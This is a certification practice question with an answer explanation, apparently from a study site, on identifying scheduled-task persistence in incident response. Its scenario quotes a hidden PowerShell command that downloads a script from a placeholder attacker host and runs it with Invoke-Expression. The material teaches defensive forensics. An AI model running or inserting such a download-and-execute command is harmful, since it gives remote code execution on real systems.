GCFA Enterprise Environment Incident Response Practice Question
An incident responder is analyzing a compromised Windows server and suspects that an attacker used a scheduled task to maintain persistence. The responder runs 'schtasks /query /fo LIST /v' and sees a task named 'Updater' with a trigger set to run every hour. The task's action is 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/script.ps1')"'. Which of the following best describes the attacker's technique?
⚠ Common exam trap
The trap here is assuming that the PowerShell script is stored locally or embedded in the task, when it is actually downloaded from a remote server.
Answer choices
Why each option matters
Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.
Correct answer & explanation
✓
The attacker is using a scheduled task to download and execute a PowerShell script from a remote server, which is a form of fileless malware and persistence.
The scheduled task runs a hidden PowerShell command that downloads and executes a remote script using Invoke-Expression. This is a fileless persistence technique because the payload is not written to disk and the task ensures recurring execution. The responder should treat this as a serious compromise, investigate the remote URL, and check for similar tasks on other systems.
Answer analysis
Option-by-option breakdown
For each option: why learners choose it and why it is or isn't the right answer here.
- ✗
The attacker is using a scheduled task to run a PowerShell script that is already stored locally on the server, which indicates a previous compromise.
Why it's wrong here
The command uses DownloadString to fetch a script from a remote URL, so the script is not stored locally. This option misinterprets the command and would lead the responder to search for a local file that does not exist. The technique is remote execution, not local execution. This misunderstanding could cause the responder to miss the network-based component of the attack.
- ✗
The attacker is using a scheduled task to run a PowerShell script that is signed by a trusted publisher, which bypasses application whitelisting.
Why it's wrong here
There is no indication of code signing in the command. The use of 'IEX' and DownloadString is typical of unsigned, malicious scripts. Assuming a trusted publisher would be incorrect and could lead the responder to overlook the malicious nature. This option introduces a detail not present in the scenario and is therefore not the best description of the technique.
- ✗
The attacker is using a scheduled task to execute a PowerShell script that is embedded in the task's action, which is a form of obfuscation.
Why it's wrong here
The script is not embedded; it is downloaded from a remote server. The action contains the download and execution command, but the actual payload is remote. This option confuses the delivery mechanism with the payload. While obfuscation might be present, the key technique is remote download and execution, not embedding. This mischaracterization could lead to incorrect remediation steps.
- ✓
The attacker is using a scheduled task to download and execute a PowerShell script from a remote server, which is a form of fileless malware and persistence.
Why this is correct
This option correctly identifies the technique: a scheduled task that runs a hidden PowerShell command to download and execute a remote script. This is fileless because the payload is not written to disk, and it provides persistence by running hourly. The use of 'IEX' (Invoke-Expression) and Net.WebClient is a common pattern for fileless attacks. The responder should investigate the remote server and check for other persistence mechanisms.
About these practice questions
This GCFA question is part of Courseiva's 292-question bank — original exam-style content with full explanations and wrong-answer analysis, never real exam questions or exam dumps. Learn why practice questions differ from exam dumps →
JA
Written and reviewed by Johnson Ajibi, MSc IT Security
Senior Network & Security Engineer · founder of Courseiva
Last reviewed September 2026 · checked against the official GIAC exam blueprint
This GCFA practice question is part of Courseiva's free GIAC certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the GCFA exam.